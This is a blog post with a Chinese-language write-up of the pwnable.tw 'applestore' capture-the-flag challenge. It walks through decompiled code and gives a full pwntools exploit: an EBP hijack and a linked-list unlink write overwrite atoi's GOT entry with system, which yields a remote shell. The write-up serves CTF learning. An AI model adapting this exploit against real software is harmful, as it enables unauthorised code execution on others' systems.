<html>

<head>
    <meta charset="utf-8">
    
    <title>pwnable tw applestore writeup | WELCOME to nobody&#39;s homepage</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="/favicon/favicon.ico">
    
<link rel="stylesheet" href="/nana7777777mi.github.io/css/main.css">

    
<link rel="stylesheet" href="/nana7777777mi.github.io/css/tagplugins.css">

    
<link rel="stylesheet" href="/nana7777777mi.github.io/css/highlight.css">

    


    <!-- rss -->
    
    
      <link rel="alternate" href="/nana7777777mi.github.io/atom.xml" title="WELCOME to nobody&#39;s homepage" type="application/atom+xml" />
    
<meta name="generator" content="Hexo 5.4.0"></head>

<body>
  <div class="blog-header">
   <a id="menu-nav-icon"><img src="/nana7777777mi.github.io/image/menu.png"/></a>
   <div class="nav-container">
     <nav id="main-nav">
       
         <a class="main-nav-link" href="/nana7777777mi.github.io/">Home</a>
       
         <a class="main-nav-link" href="/nana7777777mi.github.io/archives">Archives</a>
       
     </nav>
   </div>
   <!--
   <div id="search-form-wrap">
     <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://nana7777777mi.github.io"></form>
   </div>
 -->
    <h1 class="blog-title">WELCOME to nobody&#39;s homepage</h1>
    <p class="lead blog-description">pwn for fun not for profit</p>
</div>

  <div id='main-part'>
      <div class="main">
<div class="blog-post">
    <!-- Title -->
    <h1 class="blog-post-title">
        <a href="/nana7777777mi.github.io/2021/11/14/pwnable-tw-applestore-writeup/">
            Pwnable Tw Applestore Writeup
        </a>
    </h1>
    <!-- Date and Author -->
    <p class="blog-post-meta">
        2021-11-14
        
    </p>

    

    <!-- Content -->
    <span id="more"></span>

<h2 id="题目考点"><a href="#题目考点" class="headerlink" title="题目考点"></a>题目考点</h2><ul>
<li>ebp劫持</li>
<li>双向链表unlink实现任意地址写</li>
<li>\0截断</li>
</ul>
<h2 id="解题思路"><a href="#解题思路" class="headerlink" title="解题思路"></a>解题思路</h2><p>  菜单题，进入ida分析，先看创建节点以及插入节点的函数:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">char</span> **__cdecl <span class="title">create</span><span class="params">(<span class="keyword">int</span> a1, <span class="keyword">char</span> *a2)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> **v2; <span class="comment">// eax</span></span><br><span class="line">  <span class="keyword">char</span> **v3; <span class="comment">// ST1C_4</span></span><br><span class="line"></span><br><span class="line">  v2 = (<span class="keyword">char</span> **)<span class="built_in">malloc</span>(<span class="number">0x10</span>u);</span><br><span class="line">  v3 = v2;</span><br><span class="line">  v2[<span class="number">1</span>] = a2;</span><br><span class="line">  asprintf(v2, <span class="string">&quot;%s&quot;</span>, a1);</span><br><span class="line">  v3[<span class="number">2</span>] = <span class="number">0</span>;</span><br><span class="line">  v3[<span class="number">3</span>] = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">return</span> v3;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">int</span> __cdecl <span class="title">insert</span><span class="params">(<span class="keyword">int</span> a1)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> result; <span class="comment">// eax</span></span><br><span class="line">  _DWORD *i; <span class="comment">// [esp+Ch] [ebp-4h]</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">for</span> ( i = &amp;myCart; i[<span class="number">2</span>]; i = (_DWORD *)i[<span class="number">2</span>] )</span><br><span class="line">    ;</span><br><span class="line"><span class="comment">//遍历找到当前链表中最后一个节点</span></span><br><span class="line">  i[<span class="number">2</span>] = a1;</span><br><span class="line"><span class="comment">//i.fd = a1;</span></span><br><span class="line">  result = a1;</span><br><span class="line">  *(_DWORD *)(a1 + <span class="number">12</span>) = i;</span><br><span class="line"><span class="comment">//a1.bk = i;</span></span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>  可以看出myCart中是一个双向链表，结构如下:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">item</span>&#123;</span></span><br><span class="line">	<span class="keyword">char</span>* itemName;</span><br><span class="line">	<span class="keyword">char</span>* itemPrice;</span><br><span class="line">	item* fd;</span><br><span class="line">	item* bk;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>  接下来寻找漏洞点，发现程序中使用my_read函数提供了类似read的功能，多次出现”只需要一个字节的地方read了0x15字节”的现象:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;Let me check your cart. ok? (y/n) &gt; &quot;</span>);</span><br><span class="line">fflush(<span class="built_in">stdout</span>);</span><br><span class="line">my_read(&amp;buf, <span class="number">0x15</span>u);</span><br></pre></td></tr></table></figure>
<p>  如cart函数:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">cart</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">signed</span> <span class="keyword">int</span> v0; <span class="comment">// eax</span></span><br><span class="line">  <span class="keyword">signed</span> <span class="keyword">int</span> v2; <span class="comment">// [esp+18h] [ebp-30h]</span></span><br><span class="line">  <span class="keyword">int</span> v3; <span class="comment">// [esp+1Ch] [ebp-2Ch]</span></span><br><span class="line">  _DWORD *i; <span class="comment">// [esp+20h] [ebp-28h]</span></span><br><span class="line">  <span class="keyword">char</span> buf; <span class="comment">// [esp+26h] [ebp-22h]</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span> v6; <span class="comment">// [esp+3Ch] [ebp-Ch]</span></span><br><span class="line"></span><br><span class="line">  v6 = __readgsdword(<span class="number">0x14</span>u);</span><br><span class="line">  v2 = <span class="number">1</span>;</span><br><span class="line">  v3 = <span class="number">0</span>;</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;Let me check your cart. ok? (y/n) &gt; &quot;</span>);</span><br><span class="line">  fflush(<span class="built_in">stdout</span>);</span><br><span class="line">  my_read(&amp;buf, <span class="number">0x15</span>u);</span><br><span class="line"><span class="comment">//为了程序正常运行，ebp-22h与ebp-21h的位置需要分别填入&#x27;y&#x27;与&#x27;\x00&#x27;</span></span><br><span class="line"><span class="comment">//栈中可以控制的地址范围为从 ebp-20h 开始 </span></span><br><span class="line">  <span class="keyword">if</span> ( buf == <span class="number">121</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;==== Cart ====&quot;</span>);</span><br><span class="line">    <span class="keyword">for</span> ( i = (_DWORD *)dword_804B070; i; i = (_DWORD *)i[<span class="number">2</span>] )</span><br><span class="line">    &#123;</span><br><span class="line">      v0 = v2++;</span><br><span class="line">      <span class="built_in">printf</span>(<span class="string">&quot;%d: %s - $%d\n&quot;</span>, v0, *i, i[<span class="number">1</span>]);</span><br><span class="line">      v3 += i[<span class="number">1</span>];</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> v3;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>  此外，还发现在checkout函数中存在条件判断:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">unsigned</span> <span class="keyword">int</span> <span class="title">checkout</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> v1; <span class="comment">// [esp+10h] [ebp-28h]</span></span><br><span class="line">  <span class="keyword">char</span> *v2; <span class="comment">// [esp+18h] [ebp-20h]</span></span><br><span class="line">  <span class="keyword">int</span> v3; <span class="comment">// [esp+1Ch] [ebp-1Ch]</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span> v4; <span class="comment">// [esp+2Ch] [ebp-Ch]</span></span><br><span class="line"></span><br><span class="line">  v4 = __readgsdword(<span class="number">0x14</span>u);</span><br><span class="line">  v1 = cart();</span><br><span class="line">  <span class="keyword">if</span> ( v1 == <span class="number">7174</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;*: iPhone 8 - $1&quot;</span>);</span><br><span class="line">    asprintf(&amp;v2, <span class="string">&quot;%s&quot;</span>, <span class="string">&quot;iPhone 8&quot;</span>);</span><br><span class="line">    v3 = <span class="number">1</span>;</span><br><span class="line">    insert(&amp;v2);</span><br><span class="line">    v1 = <span class="number">7175</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;Total: $%d\n&quot;</span>, v1);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Want to checkout? Maybe next time!&quot;</span>);</span><br><span class="line">  <span class="keyword">return</span> __readgsdword(<span class="number">0x14</span>u) ^ v4;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>  这里的v2作为一个新建节点储存在栈中地址从ebp-0x20开始，观察其他函数: 当程序在handler函数中运行到cart()，checkout()，delete()等函数时，ebp是相同的，这也意味着在其他函数中也有机会修改ebp-0x20位置附近的值，达到修改iPhone8节点中fd、bk指针值的目的，进而可以达到泄露libc、unlink任意地址写的目的;<br>  另一方面来理解，此处的新增节点只是一个局部变量，可是程序却可以在退出该函数，局部变量失效的情况下再次访问这个节点，甚至可以理解为栈中的”UAF”;<br>  回到delete的代码:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">unsigned</span> <span class="keyword">int</span> <span class="title">delete</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">signed</span> <span class="keyword">int</span> v1; <span class="comment">// [esp+10h] [ebp-38h]</span></span><br><span class="line">  _DWORD *v2; <span class="comment">// [esp+14h] [ebp-34h]</span></span><br><span class="line">  <span class="keyword">int</span> v3; <span class="comment">// [esp+18h] [ebp-30h]</span></span><br><span class="line">  <span class="keyword">int</span> v4; <span class="comment">// [esp+1Ch] [ebp-2Ch]</span></span><br><span class="line">  <span class="keyword">int</span> v5; <span class="comment">// [esp+20h] [ebp-28h]</span></span><br><span class="line">  <span class="keyword">char</span> nptr; <span class="comment">// [esp+26h] [ebp-22h]</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span> v7; <span class="comment">// [esp+3Ch] [ebp-Ch]</span></span><br><span class="line"></span><br><span class="line">  v7 = __readgsdword(<span class="number">0x14</span>u);</span><br><span class="line">  v1 = <span class="number">1</span>;</span><br><span class="line">  v2 = (_DWORD *)dword_804B070;</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;Item Number&gt; &quot;</span>);</span><br><span class="line">  fflush(<span class="built_in">stdout</span>);</span><br><span class="line">  my_read(&amp;nptr, <span class="number">0x15</span>u);</span><br><span class="line">  v3 = atoi(&amp;nptr);</span><br><span class="line">  <span class="keyword">while</span> ( v2 )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( v1 == v3 )</span><br><span class="line">    &#123;</span><br><span class="line">      v4 = v2[<span class="number">2</span>];</span><br><span class="line">      v5 = v2[<span class="number">3</span>];</span><br><span class="line">      <span class="keyword">if</span> ( v5 )</span><br><span class="line">        *(_DWORD *)(v5 + <span class="number">8</span>) = v4;</span><br><span class="line">      <span class="keyword">if</span> ( v4 )</span><br><span class="line">        *(_DWORD *)(v4 + <span class="number">12</span>) = v5;</span><br><span class="line">      <span class="built_in">printf</span>(<span class="string">&quot;Remove %d:%s from your shopping cart.\n&quot;</span>, v1, *v2);</span><br><span class="line">      <span class="keyword">return</span> __readgsdword(<span class="number">0x14</span>u) ^ v7;</span><br><span class="line">    &#125;</span><br><span class="line">    ++v1;</span><br><span class="line">    v2 = (_DWORD *)v2[<span class="number">2</span>];</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> __readgsdword(<span class="number">0x14</span>u) ^ v7;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>  看到unlink实现的代码，我们确实能修改某些地址上的内容，但是这个”某些地址”也是有条件的，倘若直接rop修改handler函数返回地址为system地址，那么delete函数会同时修改system函数中的内容，造成程序崩溃;<br>  综上，delete中的unlink不能以system函数为目标，故切换思路，寻找程序中读取输入的函数，劫持其参数，达到写入system函数地址到got表完成got hijacking的目的;<br>  观察handler函数的内容发现:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">char</span> nptr; <span class="comment">// [esp+16h] [ebp-22h]</span></span><br><span class="line">my_read(&amp;nptr, <span class="number">0x15</span>u);</span><br><span class="line"><span class="keyword">switch</span> ( atoi(&amp;nptr) )</span><br><span class="line"><span class="comment">//...</span></span><br></pre></td></tr></table></figure>
<p>  nptr, 即ebp-22h的地方可以利用，可以将handler函数的ebp劫持到got表atoi-22h的地方，nptr与atoi函数地址重叠，再读入system_addr 与 “;sh\x00”到该位置即可getshell;</p>
<h2 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h2><p>  首先通过简单的计算构建出能生成iPhone8节点的输入:</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">16</span>):</span><br><span class="line">	add(<span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>):</span><br><span class="line">	add(<span class="string">b&#x27;4&#x27;</span>)</span><br><span class="line">checkout()</span><br></pre></td></tr></table></figure>
<p>  接下来，进到cart()函数中，利用myread来覆盖ebp-0x20(iphone8.itemName)处为puts的got表地址，以此泄露libc地址，通过链表遍历的办法来获得栈上节点地址:</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">leakAddr</span>(<span class="params">data</span>):</span></span><br><span class="line">	cart(data)</span><br><span class="line">	p.recvuntil(<span class="string">b&#x27;27: &#x27;</span>)</span><br><span class="line">	<span class="keyword">return</span> u32(p.recv(<span class="number">4</span>))</span><br><span class="line">items_start_at = <span class="number">0x804B070</span></span><br><span class="line">libc_base = leakAddr(p32(e.got[<span class="string">&#x27;puts&#x27;</span>]) + p32(<span class="number">0</span>)*<span class="number">3</span>) - l.symbols[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">heap_base = leakAddr(p32(items_start_at) + p32(<span class="number">0</span>)*<span class="number">3</span>)</span><br><span class="line">temp_addr = heap_base</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">26</span>):</span><br><span class="line">	temp_addr = leakAddr(p32(temp_addr + <span class="number">8</span>) + p32(<span class="number">0</span>)*<span class="number">3</span>)</span><br><span class="line">delet_ebp = temp_addr + <span class="number">0x20</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>  delete函数中同样能修改栈上节点的内容，通过delete函数完成unlink实现任意地址写:</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">payload1 = <span class="string">b&#x27;27&#x27;</span></span><br><span class="line">payload1 += p32(<span class="number">0</span>)*<span class="number">2</span> + p32(delet_ebp - <span class="number">0x0c</span>) + p32(e.got[<span class="string">&#x27;atoi&#x27;</span>] + <span class="number">0x22</span>)</span><br><span class="line">delete(payload1)</span><br></pre></td></tr></table></figure>
<p>  接下来handler函数会调用myread读入nptr，只需传入system及其参数就可以完成getshell了:</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">p.recvuntil(<span class="string">b&#x27;&gt;&#x27;</span>)</span><br><span class="line">payload2 = p32(libc_base + l.symbols[<span class="string">&#x27;system&#x27;</span>]) + <span class="string">b&quot;;sh\x00&quot;</span></span><br><span class="line">p.sendline(payload2)</span><br></pre></td></tr></table></figure>

<h2 id="exploit"><a href="#exploit" class="headerlink" title="exploit"></a>exploit</h2><p>  完整代码:</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">&quot;chall.pwnable.tw&quot;</span>, <span class="number">10104</span>)</span><br><span class="line">e = ELF(<span class="string">&quot;./applestore&quot;</span>)</span><br><span class="line">l = ELF(<span class="string">&quot;./libc_32.so.6&quot;</span>)</span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">data</span>):</span></span><br><span class="line">	p.recvuntil(<span class="string">b&#x27;&gt;&#x27;</span>)</span><br><span class="line">	p.sendline(<span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">	p.recvuntil(<span class="string">b&#x27;Device Number&gt;&#x27;</span>)</span><br><span class="line">	p.sendline(data)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">checkout</span>():</span></span><br><span class="line">	p.recvuntil(<span class="string">b&#x27;&gt;&#x27;</span>)</span><br><span class="line">	p.sendline(<span class="string">b&#x27;5&#x27;</span>)</span><br><span class="line">	p.recvuntil(<span class="string">b&#x27;Let me check your cart. ok? (y/n) &gt;&#x27;</span>)</span><br><span class="line">	p.sendline(<span class="string">b&#x27;y\x00&#x27;</span>)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cart</span>(<span class="params">data</span>):</span></span><br><span class="line">	p.recvuntil(<span class="string">b&#x27;&gt;&#x27;</span>)</span><br><span class="line">	p.sendline(<span class="string">b&#x27;4&#x27;</span>)</span><br><span class="line">	p.recvuntil(<span class="string">b&#x27;Let me check your cart. ok? (y/n) &gt;&#x27;</span>)</span><br><span class="line">	p.sendline(<span class="string">b&#x27;y\x00&#x27;</span> + data)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span>(<span class="params">data</span>):</span></span><br><span class="line">	p.recvuntil(<span class="string">b&#x27;&gt;&#x27;</span>)</span><br><span class="line">	p.sendline(<span class="string">b&#x27;3&#x27;</span>)</span><br><span class="line">	p.recvuntil(<span class="string">b&#x27;Item Number&gt;&#x27;</span>)</span><br><span class="line">	p.sendline(data)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">leakAddr</span>(<span class="params">data</span>):</span></span><br><span class="line">	cart(data)</span><br><span class="line">	p.recvuntil(<span class="string">b&#x27;27: &#x27;</span>)</span><br><span class="line">	<span class="keyword">return</span> u32(p.recv(<span class="number">4</span>))</span><br><span class="line">items_start_at = <span class="number">0x804B070</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">16</span>):</span><br><span class="line">	add(<span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>):</span><br><span class="line">	add(<span class="string">b&#x27;4&#x27;</span>)</span><br><span class="line">checkout()</span><br><span class="line"></span><br><span class="line">libc_base = leakAddr(p32(e.got[<span class="string">&#x27;puts&#x27;</span>]) + p32(<span class="number">0</span>)*<span class="number">3</span>) - l.symbols[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">heap_base = leakAddr(p32(items_start_at) + p32(<span class="number">0</span>)*<span class="number">3</span>)</span><br><span class="line">temp_addr = heap_base</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">26</span>):</span><br><span class="line">	temp_addr = leakAddr(p32(temp_addr + <span class="number">8</span>) + p32(<span class="number">0</span>)*<span class="number">3</span>)</span><br><span class="line">delet_ebp = temp_addr + <span class="number">0x20</span></span><br><span class="line"></span><br><span class="line">payload1 = <span class="string">b&#x27;27&#x27;</span></span><br><span class="line">payload1 += p32(<span class="number">0</span>)*<span class="number">2</span> + p32(delet_ebp - <span class="number">0x0c</span>) + p32(e.got[<span class="string">&#x27;atoi&#x27;</span>] + <span class="number">0x22</span>)</span><br><span class="line">delete(payload1)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">b&#x27;&gt;&#x27;</span>)</span><br><span class="line">payload2 = p32(libc_base + l.symbols[<span class="string">&#x27;system&#x27;</span>]) + <span class="string">b&quot;;sh\x00&quot;</span></span><br><span class="line">p.sendline(payload2)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

    <!-- Social share choices -->
    
  <div id="social-share">
    <a data-url="https://nana7777777mi.github.io/2021/11/14/pwnable-tw-applestore-writeup/" target="_blank" rel="noopener" href="https://plus.google.com/share?url=" class="googleplus"><img src="/nana7777777mi.github.io/image/googleplusicon.png" alt=""/></a>
    <a data-url="https://nana7777777mi.github.io/2021/11/14/pwnable-tw-applestore-writeup/" target="_blank" rel="noopener" href="https://twitter.com/intent/tweet?url=" class="twitter"><img src="/nana7777777mi.github.io/image/twittericon.png" alt=""/></a>
    <a data-url="https://nana7777777mi.github.io/2021/11/14/pwnable-tw-applestore-writeup/" target="_blank" rel="noopener" href="http://pinterest.com/pin/create/button/?url=" class="pinterest"><img src="/nana7777777mi.github.io/image/pinteresticon.png" alt=""/></a>
    <a data-url="https://nana7777777mi.github.io/2021/11/14/pwnable-tw-applestore-writeup/" target="_blank" rel="noopener" href="https://www.facebook.com/sharer/sharer.php?u=" class="facebook"><img src="/nana7777777mi.github.io/image/facebookicon.png" alt=""/></a>
  </div>





<!--


https://www.facebook.com/sharer/sharer.php?u=https://nana7777777mi.github.io/2021/11/14/pwnable-tw-applestore-writeup/
https://nana7777777mi.github.io/2021/11/14/pwnable-tw-applestore-writeup/
-->



    <hr />


    <!-- Tags and Categories links -->
    

    


<div class="blog-tags-container">
    <span><img src="/nana7777777mi.github.io/image/tagsicon.png" alt=""/></span>
    <a href="/nana7777777mi.github.io/tags/pwnable-ebp-hijacking-unlink/">#pwnable | ebp_hijacking | unlink</a>
</div>



    <!-- Comment using disqus -->
    

</div>
</div>


  </div>
  <!-- Footer -->
  <div id="footer">
  <div id="footer-social">
    
    
    
    
    
    
</div>

  <p id="footer-info">
    &copy; 2021 inva1id<br>
    Powered by <a href="http://hexo.io/" target="_blank">Hexo</a> -
    主题 <a href="https://github.com/Suolawangzai/hexo-theme-nebula" target="_blank">nebula</a>
  </p>

  <div id="busuanzi">
    <span id="busuanzi_container_site_pv">
      &hearts;
    总访问量: <span id="busuanzi_value_site_pv"></span>
    </span>
  </div>
  <!--
  <div id="footer-info">
    &copy; 2021 inva1id<br>
    Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
  </div>
-->
</div>

  <!-- After footer scripts -->
  <!-- Disqus Comments -->


<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

<script src="/nana7777777mi.github.io/js/main.js"></script>


<script src="/nana7777777mi.github.io/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>

</html>
